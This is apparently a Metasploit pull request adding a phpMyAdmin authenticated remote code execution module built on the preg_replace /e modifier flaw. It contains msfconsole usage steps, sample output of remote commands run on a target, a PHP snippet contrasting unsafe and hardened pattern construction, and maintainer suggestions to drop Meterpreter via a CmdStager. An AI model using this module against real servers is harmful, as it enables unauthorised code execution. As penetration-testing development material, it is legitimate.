Add 'phpMyAdmin Authenticated Remote Code Execution' aux module #9825

Merged
merged 3 commits into from Jun 18, 2018

Conversation

mcantoni
Contributor

@mcantoni mcantoni commented Apr 6, 2018

phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 does not properly choose delimiters to prevent use of the preg_replace e (aka eval) modifier, which might allow remote attackers to execute arbitrary PHP code via a crafted string, as demonstrated by the table search-and-replace implementation.

Verification

List the steps needed to make sure this thing works

  • Install phpMyAdmin (4.3.0 - https://www.phpmyadmin.net/files/4.3.0/)
  • Start msfconsole
  • use auxiliary/admin/http/phpmyadmin_null_termination_exec
  • show options
  • set rhost 1.2.3.4
  • set password secret
  • check
  • exploit

Example Output

msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > run

[+] 192.168.253.129:80 - Output for "uname -a"
[+] 192.168.253.129:80 Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > set CMD "ls -la"
CMD => ls -la
msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > run

[*] 192.168.253.129:80 - PHP version: PHP/5.3.10-1ubuntu3.26
[*] 192.168.253.129:80 - phpMyAdmin version: 4.3.0
[*] 192.168.253.129:80 - Grabbing CSRF token...
[*] 192.168.253.129:80 - Retrieved token
[*] 192.168.253.129:80 - Authenticating...
[*] 192.168.253.129:80 - Authentication successful
[*] 192.168.253.129:80 - Create random table 'idpX' into 'phpmyadmin' database...
[*] 192.168.253.129:80 - Random table created
[+] 192.168.253.129:80 - Output for "ls -la"
[+] 192.168.253.129:80 total 704
[+] 192.168.253.129:80 drwxr-xr-x  9 root root  4096 Apr  3 08:09 .
[+] 192.168.253.129:80 drwxr-xr-x  3 root root  4096 Dec 15 08:05 ..
[+] 192.168.253.129:80 -rw-r--r--  1 root root   102 Dec  5  2014 .coveralls.yml
[+] 192.168.253.129:80 -rw-r--r--  1 root root   582 Dec  5  2014 .scrutinizer.yml
[+] 192.168.253.129:80 -rw-r--r--  1 root root   731 Dec  5  2014 CONTRIBUTING.md
[+] 192.168.253.129:80 -rw-r--r--  1 root root 22283 Dec  5  2014 ChangeLog
...
...
[+] 192.168.253.129:80 -rw-r--r--  1 root root  5624 Dec  5  2014 user_password.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root   550 Dec  5  2014 version_check.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root  8967 Dec  5  2014 view_create.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root  3617 Dec  5  2014 view_operations.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root  1129 Dec  5  2014 webapp.php
[*] 192.168.253.129:80 - Remove the random table 'idpX' from 'phpmyadmin' database
[*] Auxiliary module execution completed
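The description above boils down to how a search-and-replace feature turns a user-supplied string into a preg_replace() pattern. The PHP below is an added illustration, not phpMyAdmin's or the module's code: it shows the unsafe construction next to a hardened one and a small modifier-extraction helper useful in code review. The NUL-byte check is an assumption drawn from the module's name, not from a reading of the phpMyAdmin source.

```php
<?php
// Added example (not phpMyAdmin's or the Metasploit module's code): building a
// preg_replace() pattern from user input, the unsafe way and the hardened way.
// PCRE treats everything after the closing delimiter as modifiers; on PHP < 7.0
// (the output above shows 5.3.10) the "e" modifier evals the replacement as PHP.
// "e" was deprecated in PHP 5.5 and removed in PHP 7.0.

// Unsafe: the user string is dropped between delimiters unescaped. A search
// string that contains the delimiter closes the pattern early, and whatever
// follows is parsed as the modifier list.
function unsafe_pattern(string $find): string {
    return '/' . $find . '/i';
}

// Hardened: reject NUL bytes (assumption: the "null_termination" in the module
// name suggests they matter for delimiter selection), keep the delimiter fixed,
// and let preg_quote() escape both metacharacters and the delimiter itself.
function safe_pattern(string $find): string {
    if (strpos($find, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in search string');
    }
    return '/' . preg_quote($find, '/') . '/i';
}

// For a literal search-and-replace no regex is needed at all.
function safe_replace(string $subject, string $find, string $replace): string {
    return str_ireplace($find, $replace, $subject);
}

// Review aid: return the modifier string PCRE would see for a pattern, so a
// caller can flag "e" before the pattern ever reaches preg_replace(). Mirrors
// PCRE's rule: the first unescaped occurrence of the opening delimiter closes it.
function pattern_modifiers(string $pattern): string {
    $d = $pattern[0];
    for ($i = 1, $n = strlen($pattern); $i < $n; $i++) {
        if ($pattern[$i] === '\\') { $i++; continue; }   // skip escaped char
        if ($pattern[$i] === $d) { return substr($pattern, $i + 1); }
    }
    return '';
}

// Constructed sample input: a search string carrying the delimiter plus "e".
$find = 'needle/e';
echo pattern_modifiers(unsafe_pattern($find)), "\n"; // "e/i": closed early
echo pattern_modifiers(safe_pattern($find)), "\n";   // "i": delimiter escaped
echo safe_replace('a needle/e in a haystack', $find, 'pin'), "\n";
```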

@bcoles
Contributor

bcoles commented Apr 6, 2018

Is there a reason this was implemented as an auxiliary module rather than an exploit module? Typically remote code execution vulnerabilities can be turned into exploit modules.

In this instance, the vulnerability exists within a PHP eval call, making the vulnerability a perfect candidate for an ARCH_PHP exploit module.

Alternatively, if the PHP config or web server config are locked down, you could implement an ARCH_CMD module with system() - similar to what you're doing now. You could also take it a step further and implement a CmdStager to drop Meterpreter to disk and execute it.

@wvu
Contributor

wvu commented Apr 7, 2018

Yes, this should be an exploit module. Also, I love that this is like a repeat of CVE-2013-3238. PMA ftw.

@wvu
Contributor

wvu commented Apr 7, 2018

@mcantoni: Is that an R6 in your picture? :-)

@jrobles-r7 jrobles-r7 self-assigned this Jun 13, 2018
Changed the module to an exploit module and
added documentation.
Simplify version comparisons
@jrobles-r7
Contributor

Release Notes

This module exploits a vulnerability in PHP's preg_replace() function as used by phpMyAdmin's replace table feature. phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x (prior to 4.4.15.7), and 4.0.x (prior to 4.0.10.16) are affected.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Jul 5, 2018